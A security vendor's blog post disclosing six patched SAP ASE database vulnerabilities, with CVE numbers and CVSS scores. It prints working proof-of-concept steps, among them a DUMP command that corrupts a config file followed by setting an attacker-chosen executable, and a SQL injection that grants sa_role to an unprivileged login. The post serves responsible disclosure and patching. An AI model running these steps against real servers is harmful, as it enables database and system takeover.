Trustwave SpiderLabs Uncovers Unique Cybersecurity Risks in Today's Tech Landscape. Learn More

Trustwave SpiderLabs Uncovers Unique Cybersecurity Risks in Today's Tech Landscape. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

System Takeover Through New SAP ASE Vulnerabilities

For the last several years there have been relatively few security patches for SAP Adaptive Server Enterprise (ASE). New security research conducted by Trustwave revealed a bunch of vulnerabilities in the current version of SAP’s flagship relational database product. Historically, SAP ASE is widely used by the financial sector in the US and other countries. SAP claimed once that SAP Sybase ASE powers mission-critical applications for 24 of the world’s top 25 banks. As discussed further, the vulnerabilities allow unprivileged users to gain complete control of the database and even underlying operating system in some cases.

Trustwave did look for vulnerabilities in SAP ASE in the past and has multiple advisories published on that:

Recently we decided to look into new functions of the product and performed another round of security testing. Detailed research of the product running on Windows and Linux systems discovered several issues, some unique to each operating system as well as some applicable to any underlying platform. We've focused on the latest version which was ASE 16 SP03 PL08 but it should be noted that older versions are also vulnerable to many of the flaws mentioned below: for details see respective SAP Security Notes. Overall the latest update published by SAP includes fixes for seven security vulnerabilities in Adaptive Server Enterprise, six of which were discovered by us and will be discussed in detail in this post. The most critical one has a CVSS score of 9.1.

Let's go over the issues found.

 

Arbitrary code execution via Backup Server flaws by database owners

CVE-2020-6248 : CVSS 9.1

During database backup operations, there are no security checks for overwriting critical configuration files. That means anyone who can run the DUMP command (e.g. database owners) can perform very dangerous tasks. One specific example is corrupting the Backup Server configuration file with a simple command (Windows variant, replace the path for Linux/UNIX):

dump database mydb to 'C:\SAP\ASESERVER_BS.cfg' with init
go

What does this allow us to do? On the next Backup Server restart, the corruption of configuration file will be detected by the server and it will replace the configuration with the default one. And the default configuration allows anyone to connect to the Backup Server using the sa login and an empty password! The next step would be to change the sybmultbuf_binary Backup Server setting to point to an executable of the attacker’s choice with:

C:\SAP\OCS-16_0\bin\isql.exe -S ASESERVER_BS -U sa
SET sybmultbuf_binary C:\WINDOWS\notepad.exe
go

Subsequent DUMP commands will now trigger the execution of the attacker’s executable. If SAP ASE is running on Windows, the code will run as LocalSystem by default. Here’s the attack in action:

 

Default installation of SAP ASE 16 with Cockpit on Windows leaves critical SQL Anywhere configuration file world-readable

CVE-2020-6252 : CVSS 9.0

This one is very simple, yet it only affects Windows installations of the SAP ASE 16. In short, there is a small helper database (SQL Anywhere) used by the Cockpit component of SAP ASE installation and that helper runs as LocalSystem by default. The problem is that the password to login into the helper database is in a configuration file that is readable by Everyone on Windows:

C:\SAP\COCKPIT-4\services\SccSADataserver\utildb.cfg
       BUILTIN\Administrators:(I)(F)
       NT AUTHORITY\SYSTEM:(I)(F)
       BUILTIN\Users:(I)(RX)
       NT AUTHORITY\Authenticated Users:(I)(M)

This means any valid Windows user can grab the file and recover the password to login to the helper SQL Anywhere database as the special user utility_db and then issue commands like CREATE ENCRYPTED FILE to overwrite operating system files (remember, the helper database runs as LocalSystem by default!) and possibly cause code execution with LocalSystem privileges.

 

Privilege escalation via SQL injection in global temporary tables handling routine

CVE-2020-6241 : CVSS 8.8

Global temporary tables were introduced in an update to ASE 16 and unfortunately have a flaw in handling DDL statements around it. This means any valid database user (i.e. anyone who can connect to the server, regardless of the privileges granted to that user, even a user with no special privileges) can quickly gain database administrator access as shown below (example assumes the attacker uses login james):

USE tempdb
go

CREATE GLOBAL TEMPORARY TABLE [g add m int null grant role sa_role to james--] (id int)
go
INSERT INTO [g add m int null grant role sa_role to james--] VALUES (1337)
go
ALTER TABLE [g add m int null grant role sa_role to james--] SET TRANSFER TABLE ON
go

-- Observe the sa_role granted
sp_displayroles
go

 

Arbitrary code execution as LocalSystem via XP Server flaw

CVE-2020-6243 : CVSS 8.0

Playing with different commands to launch the XP Server from within an unprivileged database connection, the following was discovered:

SERVERNAME_XP...dummy_esp s

No matter what privileges are granted to the database user executing the above statement and the fact that there is no extended stored procedure named dummy_esp registered, the XP Server will try to load and execute the file C:\SAP\.DLL in case of default installation on Windows! We also would like to point out that this location is writable by default to authenticated users:

C:\>icacls C:\SAP
C:\SAP BUILTIN\Administrators:(I)(OI)(CI)(F)
       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
       BUILTIN\Users:(I)(OI)(CI)(RX)
       NT AUTHORITY\Authenticated Users:(I)(M)
       NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

In the end, this flaw allows authenticated Windows users to gain arbitrary code execution as LocalSystem if they can connect to the SAP ASE.

 

Privilege escalation via SQL injection in DROP SERVICE handling code

CVE-2020-6253 : CVSS 7.2

Another internal SQL injection, this time in the WebServices handling code. This can only be leveraged by database owners since the flaw involves loading a database dump, but in the end, we get database administrator access. The attack is two-stage: first on an attacker-controlled ASE, a dump is created so that it contains malicious system table entry. Next, the dump is loaded on ASE being attacked so that the internal SQL injection happens during the processing of the malformed entry from the dump. For detailed POC please see Trustwave’s advisory since it’s quite long.

 

Adaptive Server Enterprise server build logs contain cleartext passwords

CVE-2020-6250 : CVSS 6.8

The last one is cleartext passwords found in the installation logs believe it or not! It only affects Linux/UNIX installations:

[sap@HOST ~]$ ls -l $SYBASE/$SYBASE_ASE/init/logs/srvbuild0325.*
-rw-------. 1 sap sap 10587 Mar 25 12:22 /opt/sap/ASE-16_0/init/logs/srvbuild0325.005
...

...
Wed Mar 25 12:22:05 2020: (SQL command) exec sp_addexternlogin loopback, sa, sa, 'TopSecretPassword'
...

...
do_configure_baldr = yes
baldr_management_password = TopSecretPassword
saptoolsdb_device_physical_name = /opt/sap/data/saptoolsdata.dat
...

The logs are only readable to the SAP account, but will completely compromise the SAP ASE when joined with some other issue that allows filesystem access.

 

Conclusion

Organizations often store their most critical data in databases, which, in turn, are often necessarily exposed in untrusted or publicly exposed environments. This makes vulnerabilities like these essential to address and test quickly since they not only threaten the data in the database but potentially the full host that it is running on.

Trustwave responsibly disclosed the findings to the vendor and SAP released patches for both ASE 15.7 and 16.0 at the end of April 2020. There is no question those patches should be applied immediately if you haven't already.

Trustwave database security products will receive updates to look for the SAP patches shortly.

Resources

Trustwave Advisory TWSL2020-002: https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27168

Latest SpiderLabs Blogs

Zero Trust Essentials

This is Part 5 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here.

Read More

Why We Should Probably Stop Visually Verifying Checksums

Hello there! Thanks for stopping by. Let me get straight into it and start things off with what a checksum is to be inclusive of all audiences here, from Wikipedia [1]:

Read More

Agent Tesla's New Ride: The Rise of a Novel Loader

Malware loaders, critical for deploying malware, enable threat actors to deliver and execute malicious payloads, facilitating criminal activities like data theft and ransomware. Utilizing advanced...

Read More